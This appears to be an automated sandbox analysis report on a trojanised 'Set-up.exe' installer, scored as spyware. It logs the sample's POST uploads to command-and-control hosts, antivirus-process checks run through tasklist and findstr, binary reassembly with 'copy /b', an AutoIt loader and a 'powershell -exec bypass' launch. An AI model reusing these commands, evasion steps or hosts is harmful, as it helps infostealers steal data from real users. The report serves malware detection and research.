      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=47L2TV08AJ6VOHFPEBNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1272Host: chillysalvagk.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YE0DIPISOMVKWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1098Host: chillysalvagk.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 112Host: chillysalvagk.click
      Source: global trafficHTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop
      Source: global trafficDNS traffic detected: DNS query: lWQLYFSSyUSsI.lWQLYFSSyUSsI
      Source: global trafficDNS traffic detected: DNS query: chillysalvagk.click
      Source: global trafficDNS traffic detected: DNS query: kliptizq.shop
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: chillysalvagk.click
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 20 Dec 2024 17:17:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vba8yeLW9PyUA9TuWFHGnSs%2BaJMAVrEqsw4MYJigqAKCuf1bHWADw5m1uJZjJS4lEvDK4AEwcy3OHqBSnJl58M%2F1gOciWxucljWh7rBtcBAMuPPUiIu5js1jMVLIlhqH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f5149e8ed01de92-EWR
      Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
      Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
      Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: Solo.0.dr, Weapons.com.1.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: Solo.0.dr, Weapons.com.1.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: Solo.0.dr, Weapons.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Solo.0.dr, Weapons.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Solo.0.dr, Weapons.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
      Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: Set-up.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: Set-up.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: Set-up.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
      Source: Set-up.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: Set-up.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0H
      Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0I
      Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0O
      Source: Solo.0.dr, Weapons.com.1.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: Solo.0.dr, Weapons.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Solo.0.dr, Weapons.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Solo.0.dr, Weapons.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: powershell.exe, 0000000F.00000002.2126884415.0000000004941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Solo.0.dr, Weapons.com.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: Solo.0.dr, Weapons.com.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: Weapons.com, 0000000A.00000000.1760492941.0000000000BA5000.00000002.00000001.01000000.00000006.sdmp, Algeria.0.dr, Weapons.com.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: Set-up.exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: Set-up.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
      Source: powershell.exe, 0000000F.00000002.2126884415.0000000004941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: Solo.0.dr, Weapons.com.1.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: powershell.exe, 0000000F.00000002.2126884415.0000000004CA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
      Source: powershell.exe, 0000000F.00000002.2126884415.0000000004CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landinghZ$ld0
      Source: powershell.exe, 0000000F.00000002.2126502203.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2128883330.000000000702E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2126502203.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2126804763.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2126395033.0000000000A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blank
      Source: powershell.exe, 0000000F.00000002.2126502203.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingmancel
      Source: powershell.exe, 0000000F.00000002.2126884415.0000000004CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phish
      Source: powershell.exe, 0000000F.00000002.2126884415.0000000004CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishhZ$l
      Source: powershell.exe, 0000000F.00000002.2126884415.0000000004CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-atX)
      Source: powershell.exe, 0000000F.00000002.2126884415.0000000004CA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
      Source: powershell.exe, 0000000F.00000002.2126502203.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/D
      Source: powershell.exe, 0000000F.00000002.2126502203.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2128883330.000000000702E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2126502203.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2126804763.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2126395033.0000000000A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-c
      Source: Set-up.exeString found in binary or memory: https://www.digicert.com/CPS0
      Source: Weapons.com.1.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
      Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Windows\CindyReproductionJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Windows\MagicalGroundJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Windows\NutritionalRochesterJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Windows\RachelBlankJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Windows\HungryRegardJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Windows\RefusePresidentJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Windows\PharmaciesRentalsJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0040737E0_2_0040737E
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406EFE0_2_00406EFE
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004079A20_2_004079A2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004049A80_2_004049A8
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\405361\Weapons.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 004062CF appears 57 times
      Source: Set-up.exeStatic PE information: invalid certificate
      Source: Set-up.exe, 00000000.00000003.1715835111.00000000007B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Set-up.exe
      Source: Set-up.exe, 00000000.00000002.1716560944.00000000007B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Set-up.exe
      Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comProcess created: Commandline size = 4588
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comProcess created: Commandline size = 4588Jump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/24@3/2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_03
      Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\nsc6E00.tmpJump to behavior
      Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: tasklist.exe, 00000005.00000002.1755285146.0000000002690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process;o
      Source: Set-up.exeReversingLabs: Detection: 15%
      Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\user\Desktop\Set-up.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
      Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Meta Meta.cmd & Meta.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 405361
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Supervisors" Relaxation
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Singh + ..\Adaptation + ..\Pokemon + ..\Unified + ..\Failure + ..\Ups + ..\Related W
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\405361\Weapons.com Weapons.com W
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="MWmHbEVHkRq1iRHQGoe4vxMFc6dY0_vvbg29zZMFNNw-1734715075-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Meta Meta.cmd & Meta.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 405361Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Supervisors" Relaxation Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Singh + ..\Adaptation + ..\Pokemon + ..\Unified + ..\Failure + ..\Ups + ..\Related WJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\405361\Weapons.com Weapons.com WJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="MWmHbEVHkRq1iRHQGoe4vxMFc6dY0_vvbg29zZMFNNw-1734715075-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <Jump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
